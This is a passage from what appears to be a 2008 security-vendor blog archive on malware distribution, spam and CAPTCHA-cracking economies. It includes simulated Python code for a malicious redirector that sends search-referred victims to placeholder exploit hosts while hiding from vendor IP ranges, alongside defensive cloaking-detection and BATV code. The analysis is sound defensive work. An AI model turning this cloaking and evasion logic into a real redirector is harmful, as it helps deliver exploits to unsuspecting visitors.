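    def campaign_from_url(url):
        # http://www.example.com/in.cgi?three -> "three"; no query string -> "default"
        return urlparse(url).query or "default"

    def handle(self, url, client_ip, referer=None, country=None):
        """Return the (status, Location) pair the TDS would answer with."""
        self.hits[client_ip] += 1
        if self.hits[client_ip] > self.max_hits:
            return 302, self.decoy
        ip = ipaddress.ip_address(client_ip)
        for rule in self.rules.get(self.campaign_from_url(url), []):
            if rule.matches(ip, referer, country):
                return 302, rule.destination
        return 302, self.decoy


VENDOR_NETS = ["198.51.100.0/24"]            # constructed stand-in for "security company" ranges


def build_demo_tds():
    """Constructed configuration: campaign 'three' pays out only for visitors arriving from a
    Google search, localized by country, and never for addresses in VENDOR_NETS."""
    return TrafficManager([
        Rule("three", "http://exploit.invalid/us/", countries={"US"},
             referer_contains="google.", blocked_nets=VENDOR_NETS),
        Rule("three", "http://exploit.invalid/fr/", countries={"FR"},
             referer_contains="google.", blocked_nets=VENDOR_NETS),
    ])


if __name__ == "__main__":
    tds = build_demo_tds()
    url = "http://www.example.com/in.cgi?three"
    print("victim from Google:", tds.handle(url, "203.0.113.5", "http://www.google.com/search?q=codec", "US"))
    print("site owner, direct:", tds.handle(url, "203.0.113.6", None, "US"))
    print("vendor range:      ", tds.handle(url, "198.51.100.9", "http://www.google.com/", "US"))
```

The practical consequence for anyone reproducing an infection report: fetch the URL through the path the victim took (a search-engine Referer, a source address unrelated to your company, and a fresh address after a few tries), or the system will quietly hand back the clean page and the report will look like a false positive.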

Other traffic management systems, like the one shown in the picture above, also offer separate logins to the web interface for the administrator, the "sellers" and the "buyers". This particular system has different views for sellers of traffic, that is, the infected websites containing an IFRAME that points to the traffic management system, and for buyers of traffic, e.g. the people who run exploit servers and try to install malware on unpatched computers and are therefore looking for potential victims. Such traffic management systems sit between the infected websites and the exploit servers. As the picture also shows, payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, campaigns can easily be swapped, or the "traffic" sold on to new buyers who want to install their own malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.
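A website owner who suspects this kind of referrer- and IP-based cloaking can test for it by fetching the same page under several visitor profiles and comparing where each one is sent. The following is an added example (not code from the post or from any traffic management system); the redirector it runs against offline is a constructed stand-in whose rules mirror the ones described above, and the IP ranges, hostnames and the “vendor” network are placeholders.

```python
"""Cloaking check: fetch one URL as different visitors and flag differing outcomes.
The fetcher is pluggable so the check runs offline against a constructed redirector."""
import ipaddress
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Optional, Tuple

Response = Tuple[int, Optional[str]]                       # (HTTP status, Location header or None)
Fetcher = Callable[[str, Optional[str], str], Response]    # fetch(url, referer, client_ip)


@dataclass(frozen=True)
class VisitorProfile:
    name: str
    referer: Optional[str]   # None models the owner typing the URL directly
    client_ip: str           # documentation-range addresses, constructed for the example


PROFILES = [
    VisitorProfile("owner-direct", None, "203.0.113.10"),
    VisitorProfile("google-search", "https://www.google.com/search?q=example", "198.51.100.25"),
    VisitorProfile("google-search-from-vendor-range", "https://www.google.com/search?q=example", "192.0.2.7"),
]


def check_cloaking(fetch: Fetcher, url: str) -> dict:
    """Fetch `url` once per profile and flag any difference in the outcome.
    A clean site answers every profile the same way; a TDS-fronted page
    redirects only the profiles its rules select."""
    outcomes = {p.name: fetch(url, p.referer, p.client_ip) for p in PROFILES}
    distinct = set(outcomes.values())
    return {
        "cloaked": len(distinct) > 1,
        "redirect_targets": sorted({loc for _, loc in distinct if loc}),
        "outcomes": outcomes,
    }


# --- Constructed stand-in for a compromised page fronted by a TDS (not a real system).
VENDOR_RANGES = [ipaddress.ip_network("192.0.2.0/24")]   # placeholder "security company" range


def simulated_tds(url: str, referer: Optional[str], client_ip: str) -> Response:
    """Rule set from the post: redirect search-referred visitors unless they
    come from a network the operator wants to keep in the dark."""
    came_from_search = bool(referer) and "google." in referer
    from_vendor = any(ipaddress.ip_address(client_ip) in net for net in VENDOR_RANGES)
    if came_from_search and not from_vendor:
        return (302, "http://exploit-server.invalid/landing")   # placeholder target
    return (200, None)   # owner and scanner see the ordinary page


def clean_site(url: str, referer: Optional[str], client_ip: str) -> Response:
    """Baseline: a site with nothing injected answers everyone the same way."""
    return (200, None)


# --- Live fetcher for real use. One host cannot vary its source address, so run the
# check from several vantage points; client_ip is recorded in the profile, not spoofed.
class _NoFollow(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # surface the redirect as an HTTPError instead of following it


def http_fetch(url: str, referer: Optional[str], client_ip: str) -> Response:
    headers = {"User-Agent": "Mozilla/5.0 (compatible; cloaking-check)"}
    if referer:
        headers["Referer"] = referer
    opener = urllib.request.build_opener(_NoFollow)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as resp:
            return (resp.status, None)
    except urllib.error.HTTPError as err:
        return (err.code, err.headers.get("Location"))


if __name__ == "__main__":
    report = check_cloaking(simulated_tds, "http://compromised-site.invalid/")
    for name, outcome in report["outcomes"].items():
        print(f"{name:35} -> {outcome}")
    print("cloaked:", report["cloaked"], "targets:", report["redirect_targets"])
```

Against a live site, swap `simulated_tds` for `http_fetch` and repeat the run from a network the operator is unlikely to have listed, since the vendor-range profile shows exactly why a single scan from a known address can come back clean.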

Secure Computing Links With McAfee Avert Labs

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert Labs

Exploit-MS08-067 Bundled in Commercial Malware Kit

Probably the most widely reported topic in the Chinese security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted to a well-known public repository site. Within a few days, malware kit author WolfTeeth was quick to sell an MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

WolfTeeth

Taking a peek into his “malware shop”, one finds a series of malware kits for sale - including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offer a free version, and a commercial version with enhanced features including:

  • Kernel rootkit.
  • Anti-virus software termination.
  • Weekly anti-virus detection monitoring and evasion service.
  • Web DDoS attack option (targeting web servers with expensive HTTP requests, such as those to an active web application).

The seller invites interested “customers” to contact him for a quote, but on another page he has publicly priced an AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, download updates, and stay stealthy.

AdClicker for Sale Site

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and are sold for “research use” only. As a customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

Where did all the spam go?

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visible and media-friendly part; please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it, and I wanted to dig out something meaningful for our readers, so I contacted a close partner of ours and got some real mail server stats.

Cropped Graph

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though ;)

This is no reason to rest, however; we’re still as busy as ever in the labs and watching as intently as ever. The child porn sites are already on a transatlantic move, for instance, and we’ll be calling our colleagues at the IWF today for sure.

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Cracking CAPTCHA: Another Russian Business

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have sought to defeat CAPTCHA mechanisms in order to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer services, and the competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundreds of thousands of CAPTCHAs. Rates vary from $8 to $1 per 1,000 CAPTCHAs.

A less expensive solution consists of using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands of CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of their OCR algorithms. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood forums, guestbooks, blogs, wikis, etc. with messages and links. It automatically finds and fills in required fields with no need for a browser. If the forum requires registration, the program will register, log in, and post the spammer’s text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat” CAPTCHAs presented in the picture below.

On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And he concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

The darksides domains

Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris, no less). I then read Brian Krebs’ post about Atrivo being one of the best known dangerous networks around… He finished with a teaser note about ESTDomains. So, guessing what’s coming next, I’m going to skip the inter-networking gymnastics that bind EST with Atrivo/Intercage/(cernel|inhoster)/etc., privacy services and others, start at the far end of the story, expose a secret about a not-so-little Indian company called Directi, and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

  • Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
  • Directi own LogicBoxes, the maker of a product used to manage the registrar relationship with registries.
  • Directi own the reseller Resellerclub.com and the registrar Answerable.com, amongst others.
  • Directi own skenzo.com, a domain typo-squatting monetization service.
  • Directi’s LogicBoxes is responsible for over 3.5M domains and about 45K resellers across 50+ ICANN accredited registrars.
  • LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi’s LogicBoxes provides domain registration automation services under contract but without an AUP, and to organizations that have an unholy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution, but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service, and Directi are involved at every stage of the game via its service layer even though, on the face of it, it looks like they aren’t.

(If you don’t understand the cat’s cradle of knotted string that holds the domain name registration system together then blame John Levine, as he has admitted it’s all his fault and this slide explains it all, “apparently” ;) ).

So on to the murky world of registrars also being resellers, and why:
ESTDomains and Dynamic Dolphin, to name but a few, are huge Directi resellers and, as ICANN accredited registrars, also customers of LogicBoxes. But as Garth’s and Brian’s posts show, there are also many other “shill” registrars and unanswered questions too. Between them they provide a disproportionate number of domains that are used for illegal activities, and most have a path back to Directi’s LogicBoxes service. I’d estimate the total to be north of 100,000 domains by now, everything from social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone who still doubts the darkness of their hats: take a look at the URIBL listings for the last 5 days for ESTDomains. All the linked domains are sites you do not want to click, as they contain spam landing pages, fake anti-malware, and porn with fake codecs, amongst other things. Why on earth a legitimate registrar would not monitor URIBL’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well-publicized, working contacts. We have procurement and vendor qualification processes that are a real pain sometimes but excellent IMHO; I’ll ask someone to send them a copy ;)

Our friends at Spamhaus have plenty to say about ESTDomains too on many listings; take a look at their nameserver listings for starters: SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rat’s nest of issues; a rat’s nest that would do well to fall off the internet. For more information on the internet gymnastics I jumped over, take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains domains that I’ve investigated first hand have generally fallen into two camps: one where ESTDomains is the registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill”, sorry, I mean “white-labeled registrar”, for the previously mentioned Directi company “resellerclub dot com”. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue: register a domain directly with a Directi-owned registrar and break the AUP and they will act, as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear too that the ESTDomains portfolio has had its privacy protection revoked; this is definitely a step in the right direction. (Breaking news this evening from El Reg and Knujon, nice work guys.) However, these guys move pretty fast, and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services, Bhavin Turakhia and Divyank Turakhia from Directi: you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you ;)

The S.P.A.M Experiment Final Report

On July 1 we released the results of our S.P.A.M (Spammed Persistently All Month) Experiment, in which 50 people from around the world surfed the Web unprotected for 30 days. By taking part in the experiment, participants were given permission to go where most Internet users would not dare, in order to discover how much spam they would attract and what the effects would be. Go everywhere we have told you not to go. Click everything we told you not to click. We then studied the daily blogs and analyzed the spam itself and confirmed that spammers are as active as ever; they are increasingly using psychological tricks to lure Internet users to part with their contact details, identity information and cash. The experiment (the first of its kind) clearly shows that spam continues to evolve, utilizing more local languages and cultural nuances, as well as becoming much more targeted in a bid to avoid detection.

Our brave and bold participants were assembled from 10 countries and by the end of the 30 days they received more than 104,000 spam emails–that’s an average of 2,096 messages each, the equivalent of approximately 70 messages a day.

Many of the spam messages received were phishing emails: emails that pose as a trustworthy source to criminally acquire sensitive information such as usernames, passwords, and bank account details. Other emails carried viruses, and many allowed malware to be silently installed on the computers by persuading participants to surf unsafe web sites. A number of participants noted a decrease in their computer’s processing speed, as well as an increased number of pop-ups.

The Global ‘Spam League’ (total spam messages received by participants, per country):

1. United States 23233
2. Brazil 15856
3. Italy 15610
4. Mexico 12229
5. United Kingdom 11965
6. Australia 9214
7. The Netherlands 6378
8. Spain 5419
9. France 2597
10. Germany 2331

To read more about the participants’ experiences, go here, and make sure you download the ‘Global Spam Diaries’ as well.

Breaking News… NOT!

There mustn’t be much going on in the world today, as the Nuwar spammers have moved from jumping on real news of natural disasters and current affairs to creating their own fictional events! This high-volume spam campaign is using some wacky subjects to lure people into clicking on the links:

Subject: Britney found hanged in locker room
Subject: White House hit by lightning, catches fire
Subject: Oprah found sleeping the streets
Subject: Eiffel Tower damaged by massive earthquake
Subject: Donald Trump missing, feared kidnapped
Subject: Lastest! Obama quits presidential race

This clever social engineering technique plays on people’s inquisitiveness about news of natural disasters and celebrities. The emails also follow the simple format of some text and a link that looks fairly harmless to the uneducated user.

All the links go to a fake pornotube page hosted on legitimate sites that have been hacked. If you click on the video (that’s actually just an image) it tries to download a .exe file. This is detected as BackDoor-DNM and the spam is also currently detected with our Anti-Spam products.

So it goes without saying: NEVER click on links in an email unless you are sure of its origin, keep your anti-virus software up to date, and if you have a website make sure it’s properly secured so you’re not hosting stuff like this.

Nuwar circulating a fake topic - Beijing earthquake

Nuwar families are known for using social engineering to trick users into downloading them. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - a Beijing earthquake (not the Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it: this page has an iframe linking to a malicious JavaScript.

Upon accessing the above page, the obfuscated JavaScript is downloaded and run because of the injected iframe. The JavaScript exploits the RealPlayer vulnerability CVE-2008-1309 and downloads another variant of Nuwar. McAfee VSE blocks the script and detects it as “JS/Exploit-Shell.gen”.

At the time of writing, the downloaded file was corrupted.

and I say we are detecting between 400,000 and 10,000,000 malware!

This week in Paris, a friend asked me how the anti-virus situation was going and how we will be able to face up to the unexpected increase in malware numbers. “In a day, one of your competitors announced more than 1.7 million new detections. Its total detection count jumped from 74,000 to 1,800,000! If this keeps up, the level of 2 million viruses will be overtaken rapidly”, he said. Humorously, the man I was talking to concluded: “and you [McAfee], you still detect less than 400,000 threats?”

Counting malware can be quite a tricky business. At McAfee, with each anti-virus definition (DAT) release for VirusScan, we announce how many threats we are detecting. This figure, however, is a *family* count. Yesterday (June 17th, 2008), the clock said 407125.

In September 2004, with DAT release 4391, we reached 100,000 threats detected. With the 4800 release in May 2006 the number of threats detected reached 200,104. This figure doubled in 2 years, and the situation could be analyzed as follows:

To explain how it was possible to go from 74,000 to 400,000 or to 1,800,000 malware, I told my friend we had to take into consideration AV researchers’ “zoos” - in other words, “collections” - consisting of several million malware samples (sometimes we use the term “unique samples”) collected each day. I explained to him we had, roughly, in our high-security servers, 10,000,000 files:

  • classified by family
  • often with a vast number of variants
  • sometimes with multiple infected files from a single malware variant (when it is parasitic or polymorphic), or when malware authors configure their threats to serve a binary-unique version with each download. In that case, some zoos contain 1 or 2 *versions* while others will have 10,000 and others still 100,000!!
  • without forgetting the terrific “miscellaneous” subfolder for files that we cannot pigeonhole

Of course, I said almost all were detected and consequently all these numbers were not gospel truth. I added they were only useful to establish a long-term trend, on condition that their computation complies with a single rule as time goes by.

To end my demonstration I searched for real figures. First I came across AV-test.org’s statistics. On their site, they explain they manage 60 terabytes of testing data, including several million malware samples and clean files. They test malware on all important desktop and server platforms, including all currently supported versions of Windows, Linux, Solaris, Unix, Lotus Domino/Notes and MS Exchange. Having just recently received from Germany some figures summarizing their malware collection, I knew precisely the size of their collection, which exceeded 11 million unique samples (11,002,741 in April 2008).

Strengthened by this number, I was pretty sure we had - at McAfee - the same volume, including parasitic and polymorphic malware for which we have to keep multiple samples. I asked for confirmation and received some figures I entered in this other chart:

While I wrote this blog entry, I imagined the reader’s surprise: in 3 months (from January 31 to April 30) collections increased by 2,880,000 samples (at McAfee) and by 1,700,000 samples (at AV-test.org); an average of 760,000 new files each month… This is true, and it is why we constantly work on new technologies to answer this challenge.

To conclude this blog entry, I propose to you the following……. It demonstrates that it is possible to announce that we detected, at the end of 2007, “between 357,820 (DAT-5196) and 8,600,000 pieces of malware”, and I predict we will detect at the end of 2008 “between 450,000 and 22,000,000 malware”. OK, I joke a bit, but I also want to demonstrate there are many ways to count malware and you must not judge a product only by the announced number of detections.

Are You Relaying NDR Spam?

NDR spam, a.k.a. backscatter, has been around for years but has only recently hit the radar as a major spam issue, mainly due to the rise of the botnet and spammers’ desperation to get messages through to the end user.

What is an NDR?
NDR, short for Non Delivery Receipt, is an automated email sent by an MTA that informs the sender there has been a problem with the delivery of the message they have sent.

NDRs are also referred to as Delivery Status Notifications (DSN) or simply bounce messages.

So what is NDR Spam?
NDR spam occurs when spammers fake your email address in the From field when sending their spam. If the intended recipient of the spam does not exist or has no space left in their inbox, etc., then you’ll receive a Non Delivery Receipt for an email you never actually sent.

Also contributing to this problem are Challenge/Response spam filtering services, Out Of Office notifications, list auto-replies and any other auto-responder type email.

Why has it become a problem?
Spammers are constantly looking for ways to evade anti-spam filters. The recent sharp rise in NDR spam suggests that rather than just having some bad email addresses on their lists that bounce, they have started to target email addresses that bounce in order to get their spam content through to your inbox. They can do this by using totally random email addresses with a legitimate domain, which are destined to bounce, or they can compile lists of email addresses that bounce when spammed. It’s even possible the spammers are targeting domains that they know return bounces with the full message attached. Basically the spammer wants to relay his spam via a legitimate mail server to get it into your inbox, even if it doesn’t look pretty.

How big is the problem?
NDR spam is currently about 2% of all spam; that’s down from over 4% a couple of weeks ago. It’s possible this method hasn’t been effective enough for the spammers. We believe that over 50% of these bounces are coming from one botnet alone. NDR spam can be broken down into three main categories: an NDR with the full message attached, an NDR with only the spammy headers attached, or an NDR with no spam content at all.

Detecting NDR Spam
There are several problems associated with detecting this particular type of spam.

  • An NDR is technically a legitimate email coming from a legitimate mail server. This means that detecting this type of spam becomes more difficult.
  • Some NDRs have no spam content attached in the message, so there is no way to differentiate these from legitimate NDRs using traditional content filtering methods.
  • Challenge/Response emails cannot be blocked, for obvious reasons.
  • Each MTA has a different format of NDR, making them difficult to detect.

The good news…

  • Currently more than 95% of all NDR spam contains some spam content that we can use to identify and block these messages using traditional content filtering. We are detecting the vast majority of this spam already and are working hard to catch all of it. In the meantime we have introduced a rule that customers can turn on to block all NDRs if they are having an issue with it.
  • We are also investigating the implementation of Bounce Address Tag Validation (BATV) in our products. This is a method for determining whether a bounce address specified in an email is valid. It is designed to reject bounce messages to forged return addresses.

Reducing Outbound NDR Spam
Reducing the amount of NDRs sent by your server would also help this situation, with the added benefit of reducing the load on your server.

There are two types of bounce, synchronous and asynchronous. Synchronous bouncing occurs when the remote mail server rejects the message during the SMTP conversation. This helps reduce load on your server by preventing it from having to send an NDR. Unfortunately this can open your server up to dictionary attacks, but there are solutions to that issue such as tarpitting. An asynchronous bounce happens when the remote mail server accepts the message and later decides there is a problem with delivery, so it returns it by sending an NDR to the return path of the message. I would recommend using synchronous bouncing if it is a feature of your mail server.

We could suggest that all responsible administrators should leave the original message in their NDRs, making it much easier to identify and block these messages with existing anti-spam technologies, but on the flip side, if no NDR messages had the spam content in them then it wouldn’t be worth the spammers’ while sending them. Each approach has its advantages and disadvantages.
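The BATV approach mentioned above works by signing the return path of every outgoing message so that a bounce to an unsigned address can be rejected at the MX. The code below is an added example, not McAfee’s or any MTA’s implementation; it is my own rendering of the PRVS tag scheme from the BATV draft (tag format prvs=KDDDSSSSSS=address), with the signing key, addresses and fixed clock values constructed for the example.

```python
"""BATV-style return-path tagging: sign outgoing MAIL FROM, verify it on inbound
bounces, and reject bounces to addresses we never used as a sender."""
import hashlib
import hmac
import time

HASH_HEX = 6       # hex digits of the MAC kept in the tag
KEY_VERSION = 0    # single digit in the tag, allows key rollover


def _today(now=None):
    """Day number since the epoch; passing `now` keeps results reproducible."""
    return int((time.time() if now is None else now) // 86400)


def _mac(key, key_version, ddd, address):
    """Truncated HMAC over key version, expiry day and the original address."""
    msg = f"{key_version}{ddd:03d}{address}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()[:HASH_HEX]


def prvs_sign(address, key, ttl_days=7, now=None):
    """Rewrite an envelope sender as prvs=KDDDSSSSSS=local@domain, where K is the
    key version, DDD the expiry day modulo 1000 and SSSSSS the truncated MAC."""
    ddd = (_today(now) + ttl_days) % 1000
    tag = f"{KEY_VERSION}{ddd:03d}{_mac(key, KEY_VERSION, ddd, address)}"
    return f"prvs={tag}={address}"


def prvs_verify(address, key, max_ttl_days=7, now=None):
    """Return (True, original_address) for a valid, unexpired tag, else (False, None)."""
    parts = address.split("=", 2)
    if len(parts) != 3 or parts[0] != "prvs":
        return False, None                      # not one of our tagged addresses
    tag, original = parts[1], parts[2]
    if len(tag) != 4 + HASH_HEX or not tag[:4].isdigit():
        return False, None                      # malformed tag
    key_version, ddd, mac = int(tag[0]), int(tag[1:4]), tag[4:]
    if not hmac.compare_digest(mac, _mac(key, key_version, ddd, original)):
        return False, None                      # forged or tampered tag
    days_left = (ddd - _today(now) % 1000) % 1000
    if days_left > max_ttl_days:
        return False, None                      # expired: past dates wrap to large values
    return True, original


def inbound_policy(mail_from, rcpt_to, key, now=None):
    """Decision for one envelope at our MX. A null sender (MAIL FROM:<>) marks a
    bounce or auto-reply; those are accepted only for addresses we signed.
    Ordinary mail to a tagged address is delivered to the untagged original."""
    ok, original = prvs_verify(rcpt_to, key, now=now)
    if mail_from == "":
        if ok:
            return ("accept", original)
        return ("reject", "bounce to untagged or invalid return path (backscatter)")
    return ("accept", original if ok else rcpt_to)


if __name__ == "__main__":
    KEY = b"constructed-example-key"            # in practice, from MTA configuration
    signed = prvs_sign("alice@example.com", KEY)
    print("outgoing MAIL FROM:", signed)
    print("genuine bounce:    ", inbound_policy("", signed, KEY))
    print("backscatter:       ", inbound_policy("", "alice@example.com", KEY))
```

The expiry window matters: a bounce arriving more than `max_ttl_days` after the tag was issued is refused even with a correct MAC, so a harvested tagged address cannot be replayed indefinitely.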

    Code Cleanup Gone Wrong

    Almost two years ago, in 2006, Debian decided to clean up their OpenSSL implementation. They found a few lines of code that were causing Valgrind and Purify to complain about access to uninitialized memory. Without a major investigation into the purpose of the suspect lines, they were simply removed. All basic tests continued to pass with the lines removed, and Purify and Valgrind both stopped complaining about the improper memory access. The change was forgotten and everyone believed that the OpenSSL implementation was working just fine.

    For the purposes of all the OpenSSL algorithms there was no deficiency: encryption, decryption and hashes were all calculated correctly. The problem was that the PRNG used by the OpenSSL library for generating keys had been crippled when those critical lines were removed back in 2006. This was not discovered until just this week, when Luciano Bello found that without those lines the only 'random' data used to seed the PRNG was the PID of the OpenSSL process. On many Linux systems the PID is limited to a positive signed 16-bit value, which means there are only 32,767 possibilities. When new keys and certificates were generated by OpenSSL, they relied on this number to provide all of their entropy.

